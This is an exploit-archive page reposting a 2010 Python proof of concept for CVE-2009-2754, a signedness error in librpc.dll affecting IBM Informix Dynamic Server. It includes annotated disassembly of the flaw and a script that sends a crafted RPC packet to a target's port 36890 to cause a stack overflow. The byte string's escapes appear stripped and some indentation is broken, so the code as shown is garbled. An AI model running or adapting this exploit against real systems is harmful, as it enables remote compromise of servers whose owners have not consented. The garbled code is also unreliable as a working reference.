Home / os / win7

Multiple Vendor librpc.dll Signedness Error Remote Code Exec

Posted on 08 April 2010

===============================================================================
Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vulnerability
===============================================================================

# Exploit Title: ZDI-10-023: Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vulnerability
# Date: 2010-04-08
# Author: ZSploit.com
# Software Link: N/A
# Version: N/A
# Tested on: IBM Informix Dynamic Server 10.0
# CVE : CVE-2009-2754
 
#! /usr/bin/env python
###############################################################################
## File       :  zs_ids_rpc.py
## Description:
##            :
## Created_On :  Mar 21 2010
##
## (c) Copyright 2010, ZSploit.com. all rights reserved.
###############################################################################
"""
The issue in __lgto_svcauth_unix():
 
.text:1000B8E1                 mov     [ebp+0], eax
.text:1000B8E4                 mov     eax, [ebx]
.text:1000B8E6                 push    eax             ; netlong
.text:1000B8E7                 add     ebx, 4
.text:1000B8EA                 call    esi ; ntohl    ; Get length of hostname
.text:1000B8EC                 cmp     eax, 0FFh    ; Signedness error, if we give 0xffffffff(-1) will pass this check
.text:1000B8F1                 jle     short loc_1000B8FD
.text:1000B8F3                 mov     esi, 1
.text:1000B8F8                 jmp     loc_1000B9D5
.text:1000B8FD ; ---------------------------------------------------------------------------
.text:1000B8FD
.text:1000B8FD loc_1000B8FD:                           ; CODE XREF: __lgto_svcauth_unix+71j
.text:1000B8FD                 mov     edi, [ebp+4]
.text:1000B900                 mov     ecx, eax
.text:1000B902                 mov     edx, ecx
.text:1000B904                 mov     esi, ebx
.text:1000B906                 shr     ecx, 2
.text:1000B909                 rep movsd        ; call memcpy here with user-supplied size cause a stack overflow
.text:1000B90B                 mov     ecx, edx
.text:1000B90D                 add     eax, 3
.text:1000B910                 and     ecx, 3
.text:1000B913                 rep movsb
"""
 
import sys
import socket
 
if (len(sys.argv) != 2):
    print "Usage:	%s [target]" % sys.argv[0]
    sys.exit(0)
 
 
data = "x80x00x00x74x00x00x00x01x00x00x00x00x00x00x00x02" 
    "x00x01x86xb1x00x00x00x01x00x00x00x00x00x00x00x01" 
    "x00x00x00x4cx00x00xd6x45xffxffxffxffx41x41x41x41" 
    "x41x41x41x41x41x41x41x41x41x41x41x41x00x00x00x00" 
    "x00x00x00x00x00x00x00x0ax42x42x42x42x42x42x42x42" 
    "x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42" 
    "x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42" 
    "x00x00x00x00x00x00x00x00"
 
host = sys.argv[1]
port = 36890
 
print "PoC for ZDI-10-023 by ZSploit.com"
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
    s.connect((host, port))
        s.send(data)
        print "Sending payload .."
    except:
        print "Error in send"
    print "Done"
except:
    print "Error in socket"
 
The ZSploit Team
http://zsploit.com


# Inj3ct0r.com [2010-04-08]

 

TOP